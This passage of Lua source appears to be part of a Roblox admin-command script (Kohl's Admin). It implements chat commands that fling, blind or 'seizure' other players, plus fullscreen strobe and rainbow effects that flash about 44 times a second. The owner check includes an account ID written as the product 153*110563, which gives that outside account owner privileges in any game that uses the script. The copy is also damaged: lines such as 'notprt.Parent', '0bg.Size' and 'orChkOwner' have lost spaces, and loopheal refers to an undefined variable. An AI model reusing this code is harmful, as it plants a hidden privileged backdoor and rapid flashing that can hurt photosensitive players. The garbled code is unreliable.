  3165. 1583.if msg:lower():sub(1,9) == "minihead " then
  3166.  
  3167. 1584.local plrz = GetPlr(plr, msg:lower():sub(10))
  3168.  
  3169. 1585.for i, v in pairs(plrz) do
  3170.  
  3171. 1586.coroutine.resume(coroutine.create(function()
  3172.  
  3173. 1587.if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(.75,.75,.75) v.Character.Torso.Neck.C0 =CFrame.new(0,.8,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  3174.  
  3175. 1588.end))
  3176.  
  3177. 1589.end
  3178.  
  3179. 1590.end
  3180.  
  3181. 1591.
  3182.  
  3183. 1592.if msg:lower():sub(1,6) == "fling " then
  3184.  
  3185. 1593.local plrz = GetPlr(plr, msg:lower():sub(7))
  3186.  
  3187. 1594.for i, v in pairs(plrz) do
  3188.  
  3189. 1595.coroutine.resume(coroutine.create(function()
  3190.  
  3191. 1596.if v and v.Character and v.Character:findFirstChild("Torso") and v.Character:findFirstChild("Humanoid") then
  3192.  
  3193. 1597.local xran local zran
  3194.  
  3195. 1598.repeat xran = math.random(-9999,9999) until math.abs(xran) >= 5555
  3196.  
  3197. 1599.repeat zran = math.random(-9999,9999) until math.abs(zran) >= 5555
  3198.  
  3199. 1600.v.Character.Humanoid.Sit = true v.Character.Torso.Velocity = Vector3.new(0,0,0)
  3200.  
  3201. 1601.local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force =Vector3.new(xran*4,9999*5,zran*4) game:service("Debris"):AddItem(frc,.1)
  3202.  
  3203. 1602.end
  3204.  
  3205. 1603.end))
  3206.  
  3207. 1604.end
  3208.  
  3209. 1605.end
  3210.  
  3211. 1606.
  3212.  
  3213. 1607.if msg:lower():sub(1,8) == "seizure " then
  3214.  
  3215. 1608.local plrz = GetPlr(plr, msg:lower():sub(9))
  3216.  
  3217. 1609.for i, v in pairs(plrz) do
  3218.  
  3219. 1610.coroutine.resume(coroutine.create(function()
  3220.  
  3221. 1611.if v and v.Character then
  3222.  
  3223. 1612.v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(math.rad(90),0,0)
  3224.  
  3225. 1613.local cl = script.ScriptBase:Clone() cl.Name = "SeizureBase" cl.Code.Value = [[repeat wait() script.Parent.Humanoid.PlatformStand = true script.Parent.Torso.Velocity = Vector3.new(math.random(-10,10),-5,math.random(-10,10)) script.Parent.Torso.RotVelocity = Vector3.new(math.random(-5,5),math.random(-5,5),math.random(-5,5)) until nil]]
  3226.  
  3227. 1614.table.insert(objects, cl) cl.Parent = v.Character cl.Disabled = false
  3228.  
  3229. 1615.end
  3230.  
  3231. 1616.end))
  3232.  
  3233. 1617.end
  3234.  
  3235. 1618.end
  3236.  
  3237. 1619.
  3238.  
  3239. 1620.if msg:lower():sub(1,10) == "unseizure " then
  3240.  
  3241. 1621.local plrz = GetPlr(plr, msg:lower():sub(11))
  3242.  
  3243. 1622.for i, v in pairs(plrz) do
  3244.  
  3245. 1623.coroutine.resume(coroutine.create(function()
  3246.  
  3247. 1624.if v and v.Character then
  3248.  
  3249. 1625.for i,v in pairs(v.Character:children()) do if v.Name == "SeizureBase" then v:Destroy() end end
  3250.  
  3251. 1626.wait(.1) v.Character.Humanoid.PlatformStand = false
  3252.  
  3253. 1627.end
  3254.  
  3255. 1628.end))
  3256.  
  3257. 1629.end
  3258.  
  3259. 1630.end
  3260.  
  3261. 1631.
  3262.  
  3263. 1632.if msg:lower():sub(1,12) == "removelimbs " then
  3264.  
  3265. 1633.local plrz = GetPlr(plr, msg:lower():sub(13))
  3266.  
  3267. 1634.for i, v in pairs(plrz) do
  3268.  
  3269. 1635.coroutine.resume(coroutine.create(function()
  3270.  
  3271. 1636.if v and v.Character then
  3272.  
  3273. 1637.for a, obj in pairs(v.Character:children()) do
  3274.  
  3275. 1638.if obj:IsA("BasePart") and (obj.Name:find("Leg") or obj.Name:find("Arm")) then obj:Destroy() end
  3276.  
  3277. 1639.end
  3278.  
  3279. 1640.end
  3280.  
  3281. 1641.end))
  3282.  
  3283. 1642.end
  3284.  
  3285. 1643.end
  3286.  
  3287. 1644.
  3288.  
  3289. 1645.if msg:lower():sub(1,5) == "name " then
  3290.  
  3291. 1646.local chk1 = msg:lower():sub(6):find(" ") + 5
  3292.  
  3293. 1647.local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  3294.  
  3295. 1648.for i, v in pairs(plrz) do
  3296.  
  3297. 1649.coroutine.resume(coroutine.create(function()
  3298.  
  3299. 1650.if v and v.Character and v.Character:findFirstChild("Head") then
  3300.  
  3301. 1651.for a, mod in pairs(v.Character:children()) do if mod:findFirstChild("NameTag") then v.Character.Head.Transparency= 0 mod:Destroy() end end
  3302.  
  3303. 1652.local char = v.Character
  3304.  
  3305. 1653.local mod = Instance.new("Model", char) mod.Name = msg:sub(chk1+1)
  3306.  
  3307. 1654.local cl = char.Head:Clone() cl.Parent = mod local hum = Instance.new("Humanoid", mod) hum.Name = "NameTag"hum.MaxHealth = 0 hum.Health = 0
  3308.  
  3309. 1655.local weld = Instance.new("Weld", cl) weld.Part0 = cl weld.Part1 = char.Head
  3310.  
  3311. 1656.char.Head.Transparency = 1
  3312.  
  3313. 1657.end
  3314.  
  3315. 1658.end))
  3316.  
  3317. 1659.end
  3318.  
  3319. 1660.end
  3320.  
  3321. 1661.
  3322.  
  3323. 1662.if msg:lower():sub(1,7) == "unname " then
  3324.  
  3325. 1663.local plrz = GetPlr(plr, msg:lower():sub(8))
  3326.  
  3327. 1664.for i, v in pairs(plrz) do
  3328.  
  3329. 1665.coroutine.resume(coroutine.create(function()
  3330.  
  3331. 1666.if v and v.Character and v.Character:findFirstChild("Head") then
  3332.  
  3333. 1667.for a, mod in pairs(v.Character:children()) do if mod:findFirstChild("NameTag") then v.Character.Head.Transparency= 0 mod:Destroy() end end
  3334.  
  3335. 1668.end
  3336.  
  3337. 1669.end))
  3338.  
  3339. 1670.end
  3340.  
  3341. 1671.end
  3342.  
  3343. 1672.
  3344.  
  3345. 1673.if msg:lower():sub(1,5) == "char " then
  3346.  
  3347. 1674.local chk1 = msg:lower():sub(6):find(" ") + 5
  3348.  
  3349. 1675.local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  3350.  
  3351. 1676.for i, v in pairs(plrz) do
  3352.  
  3353. 1677.coroutine.resume(coroutine.create(function()
  3354.  
  3355. 1678.if v and v.Character then
  3356.  
  3357. 1679.v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. msg:sub(chk1+1)
  3358.  
  3359. 1680.v:LoadCharacter()
  3360.  
  3361. 1681.end
  3362.  
  3363. 1682.end))
  3364.  
  3365. 1683.end
  3366.  
  3367. 1684.end
  3368.  
  3369. 1685.
  3370.  
  3371. 1686.if msg:lower():sub(1,7) == "unchar " then
  3372.  
  3373. 1687.local plrz = GetPlr(plr, msg:lower():sub(8))
  3374.  
  3375. 1688.for i, v in pairs(plrz) do
  3376.  
  3377. 1689.coroutine.resume(coroutine.create(function()
  3378.  
  3379. 1690.if v and v.Character then
  3380.  
  3381. 1691.v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. v.userId
  3382.  
  3383. 1692.v:LoadCharacter()
  3384.  
  3385. 1693.end
  3386.  
  3387. 1694.end))
  3388.  
  3389. 1695.end
  3390.  
  3391. 1696.end
  3392.  
  3393. 1697.
  3394.  
  3395. 1698.if msg:lower():sub(1,7) == "infect " then
  3396.  
  3397. 1699.local plrz = GetPlr(plr, msg:lower():sub(8))
  3398.  
  3399. 1700.for i, v in pairs(plrz) do
  3400.  
  3401. 1701.coroutine.resume(coroutine.create(function()
  3402.  
  3403. 1702.if v and v.Character then
  3404.  
  3405. 1703.Infect(v.Character)
  3406.  
  3407. 1704.end
  3408.  
  3409. 1705.end))
  3410.  
  3411. 1706.end
  3412.  
  3413. 1707.end
  3414.  
  3415. 1708.
  3416.  
  3417. 1709.if msg:lower():sub(1,11) == "rainbowify " then
  3418.  
  3419. 1710.local plrz = GetPlr(plr, msg:lower():sub(12))
  3420.  
  3421. 1711.for i, v in pairs(plrz) do
  3422.  
  3423. 1712.coroutine.resume(coroutine.create(function()
  3424.  
  3425. 1713.if v and v.Character and v.Character:findFirstChild("Torso") then
  3426.  
  3427. 1714.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  3428.  
  3429. 1715.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  3430.  
  3431. 1716.for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  3432.  
  3433. 1717.local cl = script.ScriptBase:Clone() cl.Name = "ify" cl.Code.Value = [[repeat wait(1/44) local clr = BrickColor.random() for i, v in pairs(script.Parent:children()) do if v:IsA("BasePart") and (v.Name ~= "Head" or not v.Parent:findFirstChild("NameTag", true)) then v.BrickColor = clr v.Reflectance = 0 v.Transparency = 0 elseif v:findFirstChild("NameTag") then v.Head.BrickColor = clr v.Head.Reflectance = 0 v.Head.Transparency = 0 v.Parent.Head.Transparency = 1 end end until nil]]
  3434.  
  3435. 1718.cl.Parent = v.Character cl.Disabled = false
  3436.  
  3437. 1719.end
  3438.  
  3439. 1720.end))
  3440.  
  3441. 1721.end
  3442.  
  3443. 1722.end
  3444.  
  3445. 1723.
  3446.  
  3447. 1724.if msg:lower():sub(1,9) == "flashify " then
  3448.  
  3449. 1725.local plrz = GetPlr(plr, msg:lower():sub(10))
  3450.  
  3451. 1726.for i, v in pairs(plrz) do
  3452.  
  3453. 1727.coroutine.resume(coroutine.create(function()
  3454.  
  3455. 1728.if v and v.Character and v.Character:findFirstChild("Torso") then
  3456.  
  3457. 1729.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  3458.  
  3459. 1730.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  3460.  
  3461. 1731.for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  3462.  
  3463. 1732.local cl = script.ScriptBase:Clone() cl.Name = "ify" cl.Code.Value = [[repeat wait(1/44) for i, v in pairs(script.Parent:children()) do if v:IsA("BasePart") and (v.Name ~= "Head" or not v.Parent:findFirstChild("NameTag", true)) then v.BrickColor = BrickColor.new("Institutional white") v.Reflectance = 0 v.Transparency = 0 elseif v:findFirstChild("NameTag") then v.Head.BrickColor = BrickColor.new("Institutional white") v.Head.Reflectance = 0 v.Head.Transparency = 0 v.Parent.Head.Transparency = 1 end end wait(1/44) for i, v in pairs(script.Parent:children()) do if v:IsA("BasePart") and (v.Name ~= "Head" or not v.Parent:findFirstChild("NameTag", true)) then v.BrickColor = BrickColor.new("Really black") v.Reflectance = 0 v.Transparency = 0 elseif v:findFirstChild("NameTag") then v.Head.BrickColor = BrickColor.new("Really black") v.Head.Reflectance = 0 v.Head.Transparency = 0 v.Parent.Head.Transparency = 1 end end until nil]]
  3464.  
  3465. 1733.cl.Parent = v.Character cl.Disabled = false
  3466.  
  3467. 1734.end
  3468.  
  3469. 1735.end))
  3470.  
  3471. 1736.end
  3472.  
  3473. 1737.end
  3474.  
  3475. 1738.
  3476.  
  3477. 1739.if msg:lower():sub(1,8) == "noobify " then
  3478.  
  3479. 1740.local plrz = GetPlr(plr, msg:lower():sub(9))
  3480.  
  3481. 1741.for i, v in pairs(plrz) do
  3482.  
  3483. 1742.coroutine.resume(coroutine.create(function()
  3484.  
  3485. 1743.if v and v.Character then
  3486.  
  3487. 1744.Noobify(v.Character)
  3488.  
  3489. 1745.end
  3490.  
  3491. 1746.end))
  3492.  
  3493. 1747.end
  3494.  
  3495. 1748.end
  3496.  
  3497. 1749.
  3498.  
  3499. 1750.if msg:lower():sub(1,9) == "ghostify " then
  3500.  
  3501. 1751.local plrz = GetPlr(plr, msg:lower():sub(10))
  3502.  
  3503. 1752.for i, v in pairs(plrz) do
  3504.  
  3505. 1753.coroutine.resume(coroutine.create(function()
  3506.  
  3507. 1754.if v and v.Character and v.Character:findFirstChild("Torso") then
  3508.  
  3509. 1755.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  3510.  
  3511. 1756.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  3512.  
  3513. 1757.for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  3514.  
  3515. 1758.for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or notprt.Parent:findFirstChild("NameTag", true)) then
  3516.  
  3517. 1759.prt.Transparency = .5 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("Institutional white")
  3518.  
  3519. 1760.if prt.Name:find("Leg") then prt.Transparency = 1 end
  3520.  
  3521. 1761.elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = .5 prt.Head.Reflectance = 0 prt.Head.BrickColor= BrickColor.new("Institutional white")
  3522.  
  3523. 1762.end end
  3524.  
  3525. 1763.end
  3526.  
  3527. 1764.end))
  3528.  
  3529. 1765.end
  3530.  
  3531. 1766.end
  3532.  
  3533. 1767.
  3534.  
  3535. 1768.if msg:lower():sub(1,8) == "goldify " then
  3536.  
  3537. 1769.local plrz = GetPlr(plr, msg:lower():sub(9))
  3538.  
  3539. 1770.for i, v in pairs(plrz) do
  3540.  
  3541. 1771.coroutine.resume(coroutine.create(function()
  3542.  
  3543. 1772.if v and v.Character and v.Character:findFirstChild("Torso") then
  3544.  
  3545. 1773.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  3546.  
  3547. 1774.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  3548.  
  3549. 1775.for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  3550.  
  3551. 1776.for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or notprt.Parent:findFirstChild("NameTag", true)) then
  3552.  
  3553. 1777.prt.Transparency = 0 prt.Reflectance = .4 prt.BrickColor = BrickColor.new("Bright yellow")
  3554.  
  3555. 1778.elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = .4 prt.Head.BrickColor= BrickColor.new("Bright yellow")
  3556.  
  3557. 1779.end end
  3558.  
  3559. 1780.end
  3560.  
  3561. 1781.end))
  3562.  
  3563. 1782.end
  3564.  
  3565. 1783.end
  3566.  
  3567. 1784.
  3568.  
  3569. 1785.if msg:lower():sub(1,6) == "shiny " then
  3570.  
  3571. 1786.local plrz = GetPlr(plr, msg:lower():sub(7))
  3572.  
  3573. 1787.for i, v in pairs(plrz) do
  3574.  
  3575. 1788.coroutine.resume(coroutine.create(function()
  3576.  
  3577. 1789.if v and v.Character and v.Character:findFirstChild("Torso") then
  3578.  
  3579. 1790.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  3580.  
  3581. 1791.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  3582.  
  3583. 1792.for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  3584.  
  3585. 1793.for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or notprt.Parent:findFirstChild("NameTag", true)) then
  3586.  
  3587. 1794.prt.Transparency = 0 prt.Reflectance = 1 prt.BrickColor = BrickColor.new("Institutional white")
  3588.  
  3589. 1795.elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 1 prt.Head.BrickColor =BrickColor.new("Institutional white")
  3590.  
  3591. 1796.end end
  3592.  
  3593. 1797.end
  3594.  
  3595. 1798.end))
  3596.  
  3597. 1799.end
  3598.  
  3599. 1800.end
  3600.  
  3601. 1801.
  3602.  
  3603. 1802.if msg:lower():sub(1,7) == "normal " then
  3604.  
  3605. 1803.local plrz = GetPlr(plr, msg:lower():sub(8))
  3606.  
  3607. 1804.for i, v in pairs(plrz) do
  3608.  
  3609. 1805.coroutine.resume(coroutine.create(function()
  3610.  
  3611. 1806.if v and v.Character and v.Character:findFirstChild("Torso") then
  3612.  
  3613. 1807.if v.Character:findFirstChild("Head") then v.Character.Head.Mesh.Scale = Vector3.new(1.25,1.25,1.25) end
  3614.  
  3615. 1808.if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  3616.  
  3617. 1809.if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  3618.  
  3619. 1810.v.Character.Torso.Transparency = 0
  3620.  
  3621. 1811.v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  3622.  
  3623. 1812.v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  3624.  
  3625. 1813.v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
  3626.  
  3627. 1814.v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  3628.  
  3629. 1815.v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  3630.  
  3631. 1816.for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  3632.  
  3633. 1817.for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or notprt.Parent:findFirstChild("NameTag", true)) then
  3634.  
  3635. 1818.prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("White")
  3636.  
  3637. 1819.if prt.Name == "FAKETORSO" then prt:Destroy() end
  3638.  
  3639. 1820.elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor =BrickColor.new("White")
  3640.  
  3641. 1821.end end
  3642.  
  3643. 1822.end
  3644.  
  3645. 1823.end))
  3646.  
  3647. 1824.end
  3648.  
  3649. 1825.end
  3650.  
  3651. 1826.
  3652.  
  3653. 1827.if msg:lower():sub(1,7) == "trippy " then
  3654.  
  3655. 1828.local plrz = GetPlr(plr, msg:lower():sub(8))
  3656.  
  3657. 1829.for i, v in pairs(plrz) do
  3658.  
  3659. 1830.coroutine.resume(coroutine.create(function()
  3660.  
  3661. 1831.if v and v:findFirstChild("PlayerGui") then
  3662.  
  3663. 1832.for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  3664.  
  3665. 1833.local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUITRIPPY"
  3666.  
  3667. 1834.local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  3668.  
  3669. 1835.local cl = script.ScriptBase:Clone() cl.Code.Value = [[repeat wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(math.random(255)/255,math.random(255)/255,math.random(255)/255) until nil]] cl.Parent = scr cl.Disabled= false
  3670.  
  3671. 1836.end
  3672.  
  3673. 1837.end))
  3674.  
  3675. 1838.end
  3676.  
  3677. 1839.end
  3678.  
  3679. 1840.
  3680.  
  3681. 1841.if msg:lower():sub(1,9) == "untrippy " then
  3682.  
  3683. 1842.local plrz = GetPlr(plr, msg:lower():sub(10))
  3684.  
  3685. 1843.for i, v in pairs(plrz) do
  3686.  
  3687. 1844.coroutine.resume(coroutine.create(function()
  3688.  
  3689. 1845.if v and v:findFirstChild("PlayerGui") then
  3690.  
  3691. 1846.for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUITRIPPY" then g:Destroy() end end
  3692.  
  3693. 1847.end
  3694.  
  3695. 1848.end))
  3696.  
  3697. 1849.end
  3698.  
  3699. 1850.end
  3700.  
  3701. 1851.
  3702.  
  3703. 1852.if msg:lower():sub(1,7) == "strobe " then
  3704.  
  3705. 1853.local plrz = GetPlr(plr, msg:lower():sub(8))
  3706.  
  3707. 1854.for i, v in pairs(plrz) do
  3708.  
  3709. 1855.coroutine.resume(coroutine.create(function()
  3710.  
  3711. 1856.if v and v:findFirstChild("PlayerGui") then
  3712.  
  3713. 1857.for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  3714.  
  3715. 1858.local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUISTROBE"
  3716.  
  3717. 1859.local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  3718.  
  3719. 1860.local cl = script.ScriptBase:Clone() cl.Code.Value = [[repeat wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(1,1,1) wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(0,0,0) until nil]] cl.Parent = scr cl.Disabled = false
  3720.  
  3721. 1861.end
  3722.  
  3723. 1862.end))
  3724.  
  3725. 1863.end
  3726.  
  3727. 1864.end
  3728.  
  3729. 1865.
  3730.  
  3731. 1866.if msg:lower():sub(1,9) == "unstrobe " then
  3732.  
  3733. 1867.local plrz = GetPlr(plr, msg:lower():sub(10))
  3734.  
  3735. 1868.for i, v in pairs(plrz) do
  3736.  
  3737. 1869.coroutine.resume(coroutine.create(function()
  3738.  
  3739. 1870.if v and v:findFirstChild("PlayerGui") then
  3740.  
  3741. 1871.for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUISTROBE" then g:Destroy() end end
  3742.  
  3743. 1872.end
  3744.  
  3745. 1873.end))
  3746.  
  3747. 1874.end
  3748.  
  3749. 1875.end
  3750.  
  3751. 1876.
  3752.  
  3753. 1877.if msg:lower():sub(1,6) == "blind " then
  3754.  
  3755. 1878.local plrz = GetPlr(plr, msg:lower():sub(7))
  3756.  
  3757. 1879.for i, v in pairs(plrz) do
  3758.  
  3759. 1880.coroutine.resume(coroutine.create(function()
  3760.  
  3761. 1881.if v and v:findFirstChild("PlayerGui") then
  3762.  
  3763. 1882.for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  3764.  
  3765. 1883.local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUIBLIND"
  3766.  
  3767. 1884.local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  3768.  
  3769. 1885.end
  3770.  
  3771. 1886.end))
  3772.  
  3773. 1887.end
  3774.  
  3775. 1888.end
  3776.  
  3777. 1889.
  3778.  
  3779. 1890.if msg:lower():sub(1,8) == "unblind " then
  3780.  
  3781. 1891.local plrz = GetPlr(plr, msg:lower():sub(9))
  3782.  
  3783. 1892.for i, v in pairs(plrz) do
  3784.  
  3785. 1893.coroutine.resume(coroutine.create(function()
  3786.  
  3787. 1894.if v and v:findFirstChild("PlayerGui") then
  3788.  
  3789. 1895.for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUIBLIND" then g:Destroy() end end
  3790.  
  3791. 1896.end
  3792.  
  3793. 1897.end))
  3794.  
  3795. 1898.end
  3796.  
  3797. 1899.end
  3798.  
  3799. 1900.
  3800.  
  3801. 1901.if msg:lower():sub(1,7) == "guifix " then
  3802.  
  3803. 1902.local plrz = GetPlr(plr, msg:lower():sub(8))
  3804.  
  3805. 1903.for i, v in pairs(plrz) do
  3806.  
  3807. 1904.coroutine.resume(coroutine.create(function()
  3808.  
  3809. 1905.if v and v:findFirstChild("PlayerGui") then
  3810.  
  3811. 1906.for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  3812.  
  3813. 1907.end
  3814.  
  3815. 1908.end))
  3816.  
  3817. 1909.end
  3818.  
  3819. 1910.end
  3820.  
  3821. 1911.
  3822.  
  3823. 1912.if msg:lower():sub(1,9) == "loopheal " then
  3824.  
  3825. 1913.local plrz = GetPlr(plr, msg:lower():sub(10))
  3826.  
  3827. 1914.for i, v in pairs(plrz) do
  3828.  
  3829. 1915.if v then
  3830.  
  3831. 1916.local cl = script.ScriptBase:Clone() cl.Name = "LoopHeal:"..v.Name cl.Code.Value = [[
  3832.  
  3833. 1917.local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  3834.  
  3835. 1918.repeat wait()
  3836.  
  3837. 1919.coroutine.resume(coroutine.create(function()
  3838.  
  3839. 1920.if plr and plr.Character and plr.Character:findFirstChild("Humanoid") then
  3840.  
  3841. 1921.plr.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth
  3842.  
  3843. 1922.plr.Character.Humanoid.Changed:connect(function() r.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth end)
  3844.  
  3845. 1923.end
  3846.  
  3847. 1924.end))
  3848.  
  3849. 1925.until nil]] table.insert(objects, cl) cl.Parent = game.Workspace cl.Disabled = false
  3850.  
  3851. 1926.end
  3852.  
  3853. 1927.end
  3854.  
  3855. 1928.end
  3856.  
  3857. 1929.
  3858.  
  3859. 1930.if msg:lower():sub(1,11) == "unloopheal " then
  3860.  
  3861. 1931.local plrz = GetPlr(plr, msg:lower():sub(12))
  3862.  
  3863. 1932.for i,v in pairs(plrz) do for q,sc in pairs(objects) do if sc.Name == "LoopHeal:"..v.Name then sc:Destroy()table.remove(objects,q) end end end
  3864.  
  3865. 1933.end
  3866.  
  3867. 1934.
  3868.  
  3869. 1935.if msg:lower():sub(1,10) == "loopfling " then
  3870.  
  3871. 1936.local plrz = GetPlr(plr, msg:lower():sub(11))
  3872.  
  3873. 1937.for i, v in pairs(plrz) do
  3874.  
  3875. 1938.if v then
  3876.  
  3877. 1939.local cl = script.ScriptBase:Clone() cl.Name = "LoopFling:"..v.Name cl.Code.Value = [[
  3878.  
  3879. 1940.local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  3880.  
  3881. 1941.repeat
  3882.  
  3883. 1942.coroutine.resume(coroutine.create(function()
  3884.  
  3885. 1943.if plr and plr.Character and plr.Character:findFirstChild("Torso") and plr.Character:findFirstChild("Humanoid") then
  3886.  
  3887. 1944.local xran local zran
  3888.  
  3889. 1945.repeat xran = math.random(-9999,9999) until math.abs(xran) >= 5555
  3890.  
  3891. 1946.repeat zran = math.random(-9999,9999) until math.abs(zran) >= 5555
  3892.  
  3893. 1947.plr.Character.Humanoid.Sit = true plr.Character.Torso.Velocity = Vector3.new(0,0,0)
  3894.  
  3895. 1948.local frc = Instance.new("BodyForce", plr.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(xran*4,9999*5,zran*4) game:service("Debris"):AddItem(frc,.1)
  3896.  
  3897. 1949.end
  3898.  
  3899. 1950.end))
  3900.  
  3901. 1951.wait(2) until nil]] table.insert(objects, cl) cl.Parent = game.Workspace cl.Disabled = false
  3902.  
  3903. 1952.end
  3904.  
  3905. 1953.end
  3906.  
  3907. 1954.end
  3908.  
  3909. 1955.
  3910.  
  3911. 1956.if msg:lower():sub(1,12) == "unloopfling " then
  3912.  
  3913. 1957.local plrz = GetPlr(plr, msg:lower():sub(13))
  3914.  
  3915. 1958.for i,v in pairs(plrz) do for q,sc in pairs(objects) do if sc.Name == "LoopFling:"..v.Name then sc:Destroy()table.remove(objects,q) end end end
  3916.  
  3917. 1959.end
  3918.  
  3919. 1960.
  3920.  
  3921. 1961.end
  3922.  
  3923. 1962.
  3924.  
  3925. 1963.-------------------------
  3926.  
  3927. 1964.-- True Owner Commands --
  3928.  
  3929. 1965.-------------------------
  3930.  
  3931. 1966.
  3932.  
  3933. 1967.if plr.Name:lower() == nfs:lower() or plr.userId == (153*110563) or plr.userId == game.CreatorId then
  3934.  
  3935. 1968.
  3936.  
  3937. 1969.if msg:lower():sub(1,3) == "oa " then
  3938.  
  3939. 1970.local plrz = GetPlr(plr, msg:lower():sub(4))
  3940.  
  3941. 1971.for i, v in pairs(plrz) do
  3942.  
  3943. 1972.coroutine.resume(coroutine.create(function()
  3944.  
  3945. 1973.if v and not ChkOwner(v.Name) then table.insert(owners, v.Name) coroutine.resume(coroutine.create(function()repeat wait() until v and v.Character and v:findFirstChild("PlayerGui") Message("Kohltastrophe", "You're an admin!", false, {v}) end)) end
  3946.  
  3947. 1974.end))
  3948.  
  3949. 1975.end
  3950.  
  3951. 1976.end
  3952.  
  3953. 1977.
  3954.  
  3955. 1978.if msg:lower():sub(1,5) == "unoa " then
  3956.  
  3957. 1979.for i = 1, #owners do
  3958.  
  3959. 1980.coroutine.resume(coroutine.create(function()
  3960.  
  3961. 1981.if msg:lower():sub(6) == "all" or owners[i]:lower():find(msg:lower():sub(6)) == 1 then table.remove(owners, i) end
  3962.  
  3963. 1982.end))
  3964.  
  3965. 1983.end
  3966.  
  3967. 1984.end
  3968.  
  3969. 1985.
  3970.  
  3971. 1986.end
  3972.  
  3973. 1987.
  3974.  
  3975. 1988.--------------------
  3976.  
  3977. 1989.-- Owner Commands --
  3978.  
  3979. 1990.--------------------
  3980.  
  3981. 1991.
  3982.  
  3983. 1992.if plr.Name:lower() == nfs:lower() or plr.userId == (153*110563) or plr.userId == game.CreatorId orChkOwner(plr.Name:lower()) then
  3984.  
  3985. 1993.
  3986.  
  3987. 1994.if msg:lower():sub(1,3) == "pa " then
  3988.  
